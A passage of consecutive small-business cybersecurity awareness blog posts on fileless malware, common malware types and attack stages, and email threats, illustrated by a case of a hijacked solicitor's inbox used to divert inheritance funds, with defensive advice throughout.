Once the malware had successfully compromised a server, it would replicate and spawn threads to achieve different goals, e.g. one would use brute force to access more targets while another deployed the payload. It did this so it could run a cryptocurrency miner to process and steal cryptocurrency transactions from Monero.
Code Red
Identified as the first-ever fileless attack, Code Red spread worldwide in 2001 and affected more than 300,000 servers.
The worm exploited a Windows vulnerability and affected users of Windows NT, Windows 2000, and Microsoft IIS web server software. It caused websites using the webserver to display incorrectly.
According to a Sophos threat researcher, Microsoft released a patch to protect against the vulnerability just a month before the attack, showcasing the importance of updating software as soon as patches are available.
How to protect your business
Fileless malware is particularly tricky to detect because it’s written into memory or trusted, legitimate code. That means standard antivirus software doesn’t always detect a problem. And, in cases where the code is written to memory and wiped on restart, there’s no trace of the malicious code to work from.
However, there are some steps you can take to look after your cyber hygiene and give your business the best defence against malware in general, including fileless malware.
Patch your systems
Just like Code Red, unpatched vulnerabilities in operating systems, browsers, and software are a breeding ground for cyber threats. To counter this, install patches and security updates as soon as they’re available to give your business the best protection.
Continuous logging and monitoring
It’s important to stay on top of any security incidents so you have a full understanding of your IT infrastructure. It’s also important to monitor your systems for any unusual activity so you can respond to potential threats quickly and limit the damage. This can be difficult to do in-house unless you’re a very big business with lots of cybersecurity experience, but there are many options for third parties to monitor your security for 24/7 protection.
Education
To avoid threats, your people need to understand them. And the same is true for fileless malware. So, make cybersecurity training regular, bitesize, and as fun as possible. It’s not about fearmongering, it’s about arming your teams with knowledge.
Endpoint protection
An endpoint is a device that connects to and exchanges information with a computer network. Endpoint protection includes measures such as device encryption, perimeter security on cloud storage, network access control, anti-malware, and more.
Get Cyber Essentials certified
Cyber Essentials is a government-backed scheme with a simple framework based on five technical controls. Many of these controls include actions that overlap with our other tips in this section, so you can tick more off your to-do list in one go.
Secure configuration
Malware protection
Network firewalls
User access controls
Security update management
It’s a great starting point for businesses looking to improve their cybersecurity credentials before moving on to more complex and costly certifications like ISO 27001. And, if you’re unsure which option is best for you, start by reading our free guide to certifications in the UK.
The fight against fileless malware
Hopefully, these tips help you to feel more confident about protecting your business against fileless malware.
However, as with all threats, fileless malware is ever-evolving. One way to ensure you stay cyber confident is to keep updated with information on new threats. Our report on SMEs and the cost of living crisis tells you everything you need to know about how small businesses are tackling cybersecurity during an economic downturn. Read it here.
Why small businesses are at greater risk of malware attacks
Malware attacks are a well-known concern for businesses, but what type of business is more at risk?
Small businesses are just as at risk as large enterprises. In fact, 54% of SMEs reported experiencing between one to five cyberattacks in a 12-month period.
Let’s explore why.
Small businesses and malware attacks
Small and medium-sized businesses (SMEs) are less likely to have robust protocols in place to mitigate a malware attack. They might not be aware of the risks, understand what a malware attack looks like, or have the ability to react if one occurs.
And cybercriminals take advantage of unprepared businesses. 43% of cyberattacks target SMEs. Their entry points might not be as closely guarded as a larger company, and employees might not know what to do if one occurs – or even be able to identify it in the first place. Most notably, 75% of SMBs could not continue operating if they were hit with ransomware.
Every malware attack will look slightly different, making them hard to identify. To help you stay aware, let’s take a look at the most common types.
Ransomware works by grabbing your attention. It disables your company’s data using encryption until a financial ransom is paid.
Spyware collects information from targets without their knowledge. It’s unknowingly downloaded and installed onto your devices.
Adware displays intrusive advertisements that reappear when closed. It’s usually delivered as a high number of pop-ups that disrupt your systems.
Trojan malware is disguised as something it’s not. Users unknowingly download it, believing it to be legitimate software.
Mobile malware works by installing itself onto your mobile devices. This can be an issue if you use a mobile to access sensitive business data.
Bots perform automated tasks on demand. When they make their way onto your system, it runs malicious tasks automatically.
Worms access your systems through unintentional software vulnerabilities. This is why it’s important to keep systems up to date.
Keyloggers monitor keystrokes on infected devices to collect sensitive information, like passwords.
Fileless malware hijacks software and tools you already use.
A stage-by-stage breakdown of a malware attack
Every malware attack is different, but some of them follow a similar pattern. Learning how to spot a malware attack is key to preventing one before it’s too late.
Here’s a breakdown of what you can expect.
1. Gathering information
A cybercriminal is unlikely to target a business that they know has tough defences. So they’ll start the process by gathering information on your business.
They’ll identify the systems or software that you use and any potential vulnerabilities. If they find some, then your business is more likely to be a target.
2. Targeting
The cybercriminal will make their choice of malware to target you with.
They’ll conduct their activities to begin infiltrating your organisation. For example, they might start sending phishing emails with malware attached to it. This will depend on the type of malware they choose. Be aware that malware can be incredibly sophisticated, so this type of attack can come from a device, email, software, or any channel in your business.
3. Delivery
The attacker will spread the malware to your business. This could be across your systems and software, or directly to employees. Hackers only need a single vulnerability to get in, so will exploit as many entry points as possible.
4. Exploitation
This is when the malware is triggered. It establishes a foothold on your systems by exploiting the vulnerabilities it has found. Malware can also begin to replicate itself, alter your systems, and even autonomously update the cybercriminal on its progress.
The malware will begin to disrupt your systems, software, and people. It can also steal sensitive information.
How can your small business avoid malware attacks?
SMEs are inherently more at risk as they’re less likely to have robust cybersecurity measures in place. However, it doesn’t have to stay that way.
You can mitigate the risk of a cybercriminal choosing your business by:
If you’re wondering how you can achieve all these steps fast, then a cybersecurity certification is the answer. It requires your business to comply with a strict set of cybersecurity measures to qualify. Therefore, it’s an easy way to make sure you’re following best practices.
It incorporates every step, from employee training to regulating firewalls, so that no cybersecurity measure is left unturned. So when malicious cybercriminals find your business, you’re less likely to be a target.
We all spend almost every day plugged into our emails. For most of us, this is our primary source of communication with the rest of the world – whether for work or our personal lives.
However, despite its utility, email communications can have a darker side. This blog will help answer what threats exist, why email security matters, and, most importantly, what can be done to defend against these threats. Plus, we will look at a real-life case in which email was used to steal hundreds of thousands of pounds.
What vulnerabilities could exist in my email security?
So, what vulnerabilities could exist when using your email? The first and greatest threat is phishing, I won’t discuss this further as there is already lots of good information available about phishing, including this blog post.
Phishing also has a close cousin. We’ve all received an email at some point from what appears, on first look, to be a legitimate sender. For instance, you might receive an email from an address at ‘arnazon.com’ asking you to update your card details. It looks legitimate if you just glance at it (which is what cybercriminals are banking on) but leads to a fake corporate website which cybercriminals will use to steal your financial information. This is known as ‘spoofing’.
Another vulnerability which extends beyond email is weak authentication. In layman’s terms, this is having a poor password. A password that is either short or one that is easily guessable, such as a piece of information that is known by you. For example, your pet’s name or your birth date.
This information can be used to launch further threats, such as man-in-the-middle attacks. This involves intercepting and potentially altering email communication between two parties to deceive or scam one or both parties.
Of course, these are only a few of the many vulnerabilities that exist, but they give us an idea of what is out there.
What are the possible impacts of these vulnerabilities?
It’s easy to assume that email security is not your greatest concern. Why would anyone want to attack you? Well, there are many reasons, whether using your personal email or work email, these are some of the possible impacts you could experience:
Identity Theft
Identity theft can lead to financial losses for you or your business, reputational damage and even legal issues.
Malware Infections
A successful malware attack could lead to the loss of important proprietary or customer data. This could prevent your business from being able to operate.
Data Breach
Sensitive information could be stolen and used against you. This could be intellectual property that could disadvantage your business. And this could see your business breach regulations and face legal consequences and receive fines.
The breached email and inheritance theft
Whilst working as a cybercrime detective in the police, I dealt with many cases that involved email as the attack method.
One such case involved a solicitor. As you can imagine, security is a top priority considering the sensitive data solicitors process. And, this solicitor had done almost everything right. They had a business-owned domain and an IT team to look after it and ensure security.
The firm’s security measures included IP whitelisting (which will be key in a minute). ‘Whitelisting’ is a security strategy that prevents users from logging into internal company platforms from anywhere other than ‘trusted locations’. For example, a ‘trusted location’ could be your head office or coworking space. In this case, there was only one trusted location, the solicitors’ office.
What went wrong?
Due to the pressures of the job, one solicitor in the firm decided to work outside of the office in the evenings and on weekends. To do this, they created a new email using the solicitors’ business name.
Here’s where things go wrong. Unfortunately, this account was discovered by a cybercriminal and a weak password allowed them access to the inbox. The cybercriminal noticed one conversation that piqued their interest. The solicitor was dealing with an inheritance case and was working with the deceased’s family to distribute assets and money from the deceased’s will.
The cybercriminals hijacked this conversation. Adding a forwarding rule so that any responses would be forwarded into a concealed folder. Preventing the solicitor from seeing them as well as allowing the messages to be altered and dropped back into the solicitor’s inbox.
The cybercriminals intercepted an email from one of the family members containing a document which detailed the bank account the inheritance money was supposed to be transferred to. Seeing this, the bad guys pounced, changing the bank details to their own.
The solicitor logged this information and continued with the formalities. A few days later, the money was transferred and the cybercriminals found themselves hundreds of thousands of pounds richer.
How to protect yourself when using email
So, what can you do to protect yourself?
The good news is, by reading this blog you’ve taken the first step by improving your awareness. Understanding what types of threats exist and being alive to this ever-present danger will ensure that you start from the best possible place.
But it doesn’t stop there. Education is an ongoing process and if we truly want to protect ourselves, learning shouldn’t be something we do once a year. So keep working on your cybersecurity knowledge. This could be through security training or simply through reading blogs like this.
As we saw in the case above, weak authentication was the gateway to this attack. Using strong passwords is crucial. This can be achieved by using the three random words principle, as recommended by the NCSC.
On top of this, use multi-factor authentication (MFA). This attack, and others like it, could have been foiled with this extra layer of protection.
Finally, it is worth speaking with your IT teams to make sure that they implemented technical controls. This includes email filtering, to identify and block malicious content before it reaches you. As well as technologies like SPF (Sender Policy Framework) and DMARC (Domain-based Message Authentication, Reporting, and Conformance) to authenticate email sources.
Want to know more about the threats faced by small businesses like yours? Then check out our latest research report on how the cost of living crisis is impacting SMEs.
